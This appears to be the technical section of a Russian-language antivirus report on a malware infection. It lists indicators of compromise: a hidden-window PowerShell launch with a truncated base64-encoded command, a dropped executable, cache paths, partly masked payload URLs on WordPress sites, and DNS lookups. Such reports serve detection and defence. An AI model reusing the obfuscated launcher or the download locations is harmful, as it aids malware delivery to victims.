Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAG0AZgB4AGcAdwB0AHEAeAB1AHoAdgB4AD0AJwBNAGIAZwBkAGIAYgB2AHgAagBnAGcAZAAnADsAJABOAG0AegBnAGcAYQBuAHYAaQBqACAAPQAgACcAOAA2ADUAJwA7ACQAUwBwAGgAbABmAGwAbAB2AGoAeQB5AD0AJwBTAG4AZAB...
- %HOMEPATH%\865.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\865.exe
- http://www.th##to.com/wp-content/plugins/Kk685629/
- http://bl##.##stcommerz.com/wp-content/languages/JdF/
- http://os###edia.com/wp-content/FjqkF46951/
- http://ba####tuc60.info/9b27905b275987900e62033d319ca929/aM215266/
- DNS ASK th##to.com
- DNS ASK bl##.##stcommerz.com
- DNS ASK os###edia.com
- DNS ASK bl##.#chlichte.xyz
- DNS ASK ba####tuc60.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAG0AZgB4AGcAdwB0AHEAeAB1AHoAdgB4AD0AJwBNAGIAZwBkAGIAYgB2AHgAagBnAGcAZAAnADsAJABOAG0AegBnAGcAYQBuAHYAaQBqACAAPQAgACcAOAA2ADUAJwA7ACQAUwBwAGgAbABmAGwAbAB2AGoAeQB5AD0AJwBTAG4AZAB...' (со скрытым окном)